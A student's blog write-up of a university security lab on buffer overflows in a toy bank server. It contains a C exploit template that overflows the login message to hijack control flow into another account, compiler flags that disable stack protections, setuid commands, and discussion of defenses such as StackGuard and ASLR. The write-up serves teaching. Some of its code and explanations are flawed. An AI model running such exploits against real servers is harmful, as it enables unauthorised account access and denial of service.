{"id":226,"date":"2022-03-18T22:20:00","date_gmt":"2022-03-18T14:20:00","guid":{"rendered":"https:\/\/philip.twinight.co\/portfolio\/?p=226"},"modified":"2024-03-06T09:52:32","modified_gmt":"2024-03-06T01:52:32","slug":"buffer-overflow-attacks-and-defenses","status":"publish","type":"post","link":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/","title":{"rendered":"Buffer Overflow Attacks and Defenses"},"content":{"rendered":"\n<p>This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=236781290  fetchpriority=\"high\" loading=\"eager\" decoding=\"async\" width=\"1024\" height=\"249\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png\" alt=\"\" class=\"wp-image-230\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:1024\/h:249\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png 1024w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:73\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:187\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Course Instructor: Dr. Jun HUANG<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#Project_Instruction\" >Project Instruction<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#1_Overview\" >1 Overview<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#2_The_Bank_ServerClient_Program\" >2 The Bank Server\/Client Program<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#21_bankh\" >2.1 bank.h<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#22_serverc\" >2.2 server.c<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#23_clientc\" >2.3 client.c<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#3_Task_1_Identifying_Buffer_Overflow_Vulnerability\" >3 Task 1: Identifying Buffer Overflow Vulnerability<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#4_Task_2_Remote_Code_Execution_Attack\" >4 Task 2: Remote Code Execution Attack<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#5_Task_3_Control_Flow_Hijacking_Attack\" >5 Task 3: Control Flow Hijacking Attack<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#6_Task_4_Fixing_the_Identified_Vulnerability\" >6 Task 4: Fixing the Identified Vulnerability<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#7_Task_5_Containing_Successful_Attacks\" >7 Task 5: Containing Successful Attacks<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Project_Instruction\"><\/span><strong>Project Instruction<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"1_Overview\"><\/span>1 Overview<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary of a buffer. This vulnerability can be used by a malicious user to alter the flow control of the program, leading to the execution of malicious code. The objective of this lab is to gain practical insights into this type of vulnerability, and learn how to exploit the vulnerability in attacks. You will be given a bank server\/ client program with a serious buffer-overflow vulnerability. Your task is to develop schemes to exploit the vulnerability and finally 1) remotely run your malicious code on the server; and 2) redirect the control flow of the server to hack into an arbitrary bank account. In addition to the attacks, you will also experiment with several buffer overflow countermeasures and discuss solutions to contain a successful attack.<br>This lab covers the following topics:<br>\u2022 x86 stack layout and calling convention<br>\u2022 Buffer overflow vulnerability and attack<br>\u2022 Address randomization, Non-executable stack, and StackGuard<br>\u2022 Linux privilege and access control of file system<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"2_The_Bank_ServerClient_Program\"><\/span>2 The Bank Server\/Client Program<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>The bank server and client are implemented in server.c, client.c, and bank.h. The server operates on a binary database saved in db.bin. The bank.h defines basic structures and operation interfaces. The server.c works as an entry point of the server which initializes the server, accepts user connection, authenticates user, and then starts a request handler for the connected user if authetnication is successful. The client.c implements a benign client for your reference. It sends a login request with correct username and passcode, and then queries account status, changes passcode, and transfers some money from the instructor\u2019s account to the TA\u2019s account.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"21_bankh\"><\/span>2.1 bank.h<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>The bank.h defines the structure of bank account, bank database, and the format of request messages. It<br>also implements interfaces for the client to send different requests, as well as request handlers for the server to process and reply these requests. Each bank account in db.bin has three fields, including a username defined as an array of 32 chars, a passcode defined as an array of 16 chars, and a balance field defined as an unsigned int. There are a total of 71 accounts. Each of you has an account, with your EID as the username and your Student ID as the passcode. Your default balance is 1000. Three account operations have been implemented, including query which allows you to check your account status, changePasscode which allows you to change your passcode, and transfer which allows you to transfer money to another account. Before performing these operations, the user must provide the correct username and passcode in order to login into the account. <\/p>\n\n\n\n<p>You need to know the format\/size of the login message and be aware that the bank accounts are saved in an array. Unless otherwise stated, it is not necessary to understand other codes in this file.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"22_serverc\"><\/span>2.2 server.c<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>The server.c initializes the server and provides an entry point for connected users. It has two procedures<br>namely main and auth. You need to analyze all code in this file in detail but do not need to know how<br>procedures invoked by main and auth are implemented, unless otherwise stated.<\/p>\n\n\n\n<p>The main procedure loads the binary database (db.bin) into memory, creates a TCP server, and then starts<br>a loop to accept users\u2019 connections and handle their requests. After a connection is established between<br>the server and the client, the user must provide the correct username and password in a ReqLogin<br>message (the format is defined in bank.h) in order to perform subsequent operations (e.g., query, change<br>passcode, and transfer) on the account.<\/p>\n\n\n\n<p>After a user connection is established, main will call auth, which waits for and handles the user\u2019s login<br>request. The auth procedure takes one parameter, i.e., the descriptor of the network connection which is<br>used to receive the user\u2019s message. It returns the id of the user (i.e., the index of the user\u2019s account in the<br>account array) to main. For example, the id of the TA\u2019s account (username = zihaowen2, passcode =<br>000000) is 71, because it is the last account in the database. If authentication failed, the auth procedure<br>will return an error code, which is a negative value that indicates the reason of login fail.<\/p>\n\n\n\n<p>If authentication is successful, a reqHandler procedure will be started to serve the user\u2019s other requests.<br>The reqHandler takes two parameters, including the id of the user returned by auth, and the descriptor<br>of the network connection used to interact with the client.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"23_clientc\"><\/span>2.3 client.c<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>A benign client is implemented in client.c for your reference. It shows you how to construct a login mes-<br>sage. After successful login, the client.c starts an interactive command line procedure, in which you can<br>type command such as query, change 123456 which changes passcode to 123456, and transfer<br>jhuan9 100 which transfers 100 to jhuan9\u2019s account.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"3_Task_1_Identifying_Buffer_Overflow_Vulnerability\"><\/span>3 Task 1: Identifying Buffer Overflow Vulnerability<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>The auth procedure of main.c has a serious buffer overflow vulnerability. Specifically, the receiveMessage<br>procedure receives a message from the network socket connection and saves it to msg. To facilitate pro-<br>cessing, the server will further copy msg into the local variable req so that it can access it based on the<br>structure of ReqLogin. Please answering the following questions in lab report.<\/p>\n\n\n\n<p>Question 1.1: The receiveMessage procedure in auth receives client requests from a network connection specified by the descriptor (i.e., the first parameter). Read the code of receiveMessage in bank.h and study read and memcpy by searching them in Linux man pages (man7.org\/linux\/man-pages\/index.html). In the lab report, please explain how the invocation of memcpy in auth may cause a buffer overflow.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\"><strong>My Answer:<\/strong><\/span><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>We can start explain the problem from function of <strong><em>receiveMessage<\/em><\/strong>, the <strong><em>read()<\/em><\/strong> function inside it attempts to read up to <strong><em>MSGLEN<\/em><\/strong> bytes from file descriptor <strong><em>connfd<\/em><\/strong> into the buffer starting at <strong><em>msg<\/em><\/strong>. Although this function allow the system to get the length of message, there is a chance that <strong><em>n<\/em><\/strong> is not equal to <strong><em>msg<\/em><\/strong> when it is trying to use the <strong><em>memcpy()<\/em><\/strong> to copies <strong><em>n<\/em><\/strong> bytes from memory area <strong><em>msg<\/em><\/strong> to memory area <strong><em>req<\/em><\/strong>.<\/li>\n\n\n\n<li>As function of <strong><em>memcpy()<\/em><\/strong> in auth.c doesn\u2019t check the bounds. There is no argument specify what to do if the length of memory is incorrect. It will lead to the system can\u2019t assign the correct space to the buffer. In simple word, we are only copying the entered data into the buffer directly via the<strong><em> memcpy()<\/em><\/strong>. The program would be confused and can&#8217;t handle such abundant data.<\/li>\n\n\n\n<li>So, it may lead to problem like there is not enough space in the target buffer for all the data we want to copy from the source buffer, it will cause a buffer overflow.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"4_Task_2_Remote_Code_Execution_Attack\"><\/span>4 Task 2: Remote Code Execution Attack<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Attack goal. In this task, you are required to exploit the buffer overflow vulnerability identified in Task 1 to<br>realize a remote code execution attack. Your objective is to remotely shut down the bank server to make a<br>Denial-of-Service (DoS) attack.<\/p>\n\n\n\n<p>Compilation. To realize remote code execution, you need to turn off buffer overflow countermeasures of the compiler. In addition to disabling ASLR as described in Section 3, you need to turn off the non-executable stack and StackGuard schemes. To do so, you can compile server.c as follows,<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ gcc -z execstack -fno-stack-protector server.c -o server\n<\/pre><\/div>\n\n\n<p>Making server a privileged program. Shutting down a computer requires a privileged system call. In order to make the server a privileged program, you need to change its owner to root and turn on the Set-UID bit using the following commands.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ sudo chown root server\n$ sudo chmod 4755 server\n<\/pre><\/div>\n\n\n<p>Programming 2.1: Please write a program that can send a bad login request to remotely shut down the server. A template program named attack i.c is available on Canvas. A piece of shellcode for shutting down a computer is provided as an unsigned char array named sh in attack i.c. Please complete attack i.c by embedding sh and properly structuring and constructing the content of the bad login request. You can also program in python if you feel more comfortable. However, you may need to write the client socket in python by yourself. If you do so, please name your python source code as attack i.py.<\/p>\n\n\n\n<p>Question 2.1: In the lab report, please describe how you determine the structure and content<br>of the bad login request. Your answer should be clear and provide sufficient explanations.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=1327626771  fetchpriority=\"high\" loading=\"eager\" decoding=\"async\" width=\"865\" height=\"703\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png\" alt=\"\" class=\"wp-image-233\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:865\/h:703\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png 865w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:244\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:624\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<ol class=\"wp-block-list\">\n<li>First line, we will construct the payload with an unsigned 128-byte value.<\/li>\n\n\n\n<li>The second line will be the return address, we get this address by using gbp from the function auth\u2019s ebp+0x8. For example, if the auth\u2019s ebp is 0xbfffefe8, then the return address will be 0xbfffefe8+0x8= 0xBFFFEFF0.<\/li>\n\n\n\n<li>The <strong><em>memcpy()<\/em><\/strong> function allows us to copy 4 byte of the return address to the payload address. Then we will embed the shell code in the payload and send to the server which will cause the program to overflow the destination buffer.<\/li>\n\n\n\n<li>Result of the server: Being Shut Down and the entire ubuntu virtual box even crashed!<\/li>\n<\/ol>\n\n\n\n<p>Question 2.2: Re-compile the server program without making it a privileged program. Specifically, do not change the owner of server to root after compilation. Meanwhile, do not turn on the Set-UID bit. Repeat the experiment by sending the bad login request again. Write down the output of the server and explain your observation.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>Let\u2019s try to figure it out by understanding the on-executable stack, StackGuard schemes, and a privileged program.<\/p>\n\n\n\n<p>First test, don\u2019t set the server as a privileged program and turn off the stack protector and on-executable stack counter measurement and run the attack.<\/p>\n\n\n\n<p>Output Result:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=414446309  loading=\"lazy\" decoding=\"async\" width=\"865\" height=\"527\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png\" alt=\"\" class=\"wp-image-234\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:865\/h:527\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png 865w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:183\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:468\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Explanation: In the first line of output, the connection between me and the server is being reset. I believe the shell code doesn\u2019t contain sufficient to do its operation. It can\u2019t send messages to announce maintenance and ask users to log out and close all open programs by the wall message. It is supposed the messages will be shown to all logged-in users with a terminal open. Because of the server is not a privileged program which means it isn\u2019t a root or sudo. Even the server is trying to run the shell code as the attacker successfully embed it by buffer overflow, it can\u2019t do many operations which requires sudo privileged. A system shutdown will definitely need it or some of the other special permissions (usually handled by polkit and\/or system etc).<\/p>\n\n\n\n<p>Second test, set the server to privileged program and turn on the stack protector by not running -fno-stack-protector nor on-executable stack counter measurement while compiling the server.<\/p>\n\n\n\n<p>Output Result:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=1170695254  loading=\"lazy\" decoding=\"async\" width=\"865\" height=\"520\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png\" alt=\"\" class=\"wp-image-235\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:865\/h:520\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png 865w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:180\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:462\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Explanation: By enabling the stack protector on default, it enables run-time stack overflow verification using a stack canary and stack corruption checking. So, the server is added canary value into it, whenever the value is being changed, it means there is a buffer overflow vulnerable detected. By verifying it, it may terminate the execution of the affected program, and prevent it running the shell code embed from the attacker.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"5_Task_3_Control_Flow_Hijacking_Attack\"><\/span>5 Task 3: Control Flow Hijacking Attack<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Attack goal. In this task, you are required to exploit the buffer overflow vulnerability identified in Task 1<br>to realize a control flow hijacking attack. Your objective as an attacker is to hack into an arbitrary account<br>specified by a user ID (i.e., the user\u2019s index in the account array of bank database) without providing the<br>correct username and passcode.<\/p>\n\n\n\n<p>As an important requirement, you must ensure that the server can continue operation normally (i.e., correctly accept and handle legal user\u2019s connections and requests) after the disconnection of attacker.<\/p>\n\n\n\n<p>Hints. To hack into an arbitrary bank account specified by a given id, you need to redirect the control<br>flow of server after the call of auth to invoke reqHandler with correct id (i.e., the index of the victim<br>user\u2019s account in database array) and connfd (i.e., the network connection descriptor used to interact with<br>the attacker\u2019s client), even if auth returns a negative result. The first parameter of reqHandler, i.e., the<br>pointer of bank database, will not be affected by your stack overflow attack because it is a global variable<br>and is stored in data segment.<\/p>\n\n\n\n<p>Compilation. Since this attack does not require executing any malicious code on the vulnerable server, you can leave the non-executable stack countermeasure on. However, StackGuard needs to be disabled. To do this, please compile server.c using the following command.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ gcc -fno-stack-protector server.c -o server\n<\/pre><\/div>\n\n\n<p>Question 3.1: In the lab report, please draw the stack frame layout of main and auth before<br>CPU returns from auth to main after processing a *benign* login request. Clearly label the stack with<br>memory addresses in hex. As example is given in the page 13 of Tutorial 04\u2019s slides. Please be reminded<br>again that the starting address of stack frame you observed in gdb is different from the true address while the server is running. However, the stack frame structure is the same, i.e., only the starting address of stack frame is different. To help you solve this problem, we have added some codes in the server program to print out the actual ebp values of main and auth.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=653721120  loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"784\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-20.png\" alt=\"\" class=\"wp-image-236\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:765\/h:784\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-20.png 765w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:293\/h:300\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-20.png 293w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/figure>\n\n\n\n<p>Question 3.2: Please use objdump to disassemble the binary executable of server. You can do<br>this using the following command.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ objdump -D server &gt; server.dump\n<\/pre><\/div>\n\n\n<p>Read the binary instructions of main and auth in server.dump, and then describe in the lab report that<br>which instruction address in main should be set as the return point after the call of auth.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>The 804990b instruction address in main should be set as the return point after the call of auth. The return address is what memory address the EIP (Instruction Pointer) should be set to after the function\u2019s retn statement is executed. It is the offset address of reqHandler function. By using the buffer overflow attack, the return address will be overwritten, so the attacker can bypass the original authentication of the server, and logic to the bank directly.<\/p>\n\n\n\n<p>Programming 3.1: Please write a program that can send a bad login request to realize this<br>control flow hijacking attack. A template program named attack ii.c is available on Canvas. Please<br>complete attack ii.c by properly structuring and constructing content of the bad login request. You<br>can also program in python if you feel more comfortable. However, you may need to write the client socket in python by yourself. If you do so, please name your python source code as attack ii.py.<\/p>\n\n\n\n<p>Question 3.3: Note that as a requirement of a successful attack, you must make sure that the<br>server can continue operation correctly after the disconnection of the attacker. After hacking into an account and disconnecting from the server, please keep the server running and then send a second bad login request with a different target user ID. For example, you can specify the target ID as 70 (i.e., the account of the instructor jhuan9) in the first attempt, and then set it as 71 (i.e., the account of the TA zihaowen2) in the second attempt. Note that the ID of the second attempt must be different from the one in the first attempt. In the lab report, please (1) describe which account you hacked into in the second attempt, is it the target account you specified? (2) explain your observation.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-opt-id=1607431031  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"488\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:1024\/h:488\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png\" alt=\"\" class=\"wp-image-237\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:1024\/h:488\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 1024w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:143\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:366\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 768w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:1536\/h:731\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 1536w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:1554\/h:740\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 1554w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Programming 3.2: Add a procedure into attack ii.c (or attack ii.py if you program<br>using python) that can correctly structure and construct a bad login request so that the attacker can hack into a specified account in the n-th attempt, where n should be the input parameter of your procedure.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &quot;bank.h&quot;\n\nvoid main()\n{\n\t\/\/ connect to the server\n\tint fd = createClient(&quot;127.0.0.1&quot;);\n\tif (fd &lt; 0) {\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t\/\/ construct bad login request in below and name it as payload\n\tunsigned char payload&#x5B;128];\n\tint ret = 0x080494d9;\n\tint id = 71;\n\tint ebp = 0xbffff028;\n\t\n\tmemcpy(&amp;payload&#x5B;68], &amp;ret, 4);\n\tmemcpy(&amp;payload&#x5B;44], id, 4);\n\tmemcpy(&amp;payload&#x5B;64], &amp;ebp, 4);\n\t\n\n\t\/\/ send the payload to the server\n\twrite(fd, payload, sizeof(payload));\n\t\/\/ wait for and receive the server's reply\n\tbool success = receiveReply(fd);\n\tif (success) {\n\t\tcmdlineClient(fd);\n\t}\n}\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"6_Task_4_Fixing_the_Identified_Vulnerability\"><\/span>6 Task 4: Fixing the Identified Vulnerability<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Question 4.1: Please describe in the lab report how to fix the buffer overflow vulnerability in<br>the server program.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>In order to fix the buffer overflow vulnerability in the program, we can change the memcpy function to memcpy_s, which requires the programmer to specify the maximum length of the target first. So further speaking, it acts as a barrier to prevent buffer overflow when that number is provided independent of the number of bytes to copy.<\/p>\n\n\n\n<p>Question 4.2: Please restart the VM without turning off ASLR. Run the server program again<br>for five times and write down the ebp addresses of main you observed. Explain how ASLR makes buffer<br>overflow attacks more difficult. Discuss possible countermeasures that an attacker can take to defeat ASLR.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>ebp address: bffff028<\/li>\n\n\n\n<li>ebp address: bff43ad8<\/li>\n\n\n\n<li>ebp address: bfec7228<\/li>\n\n\n\n<li>ebp address: bffff000<\/li>\n\n\n\n<li>ebp address: bf99a058<\/li>\n<\/ol>\n\n\n\n<p>By using ASLR, it randomizes the memory address space, making attacker difficult to predict the memory address layout of the program as all the entry point of the program is being randomized. But the attacker can still probe the memory by brute-forcing until they find the proper location where another app runs and then modify their code to target that memory address space.<\/p>\n\n\n\n<p>Question 4.3: Re-compile the server program with all countermeasures on. You can do it by,<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre 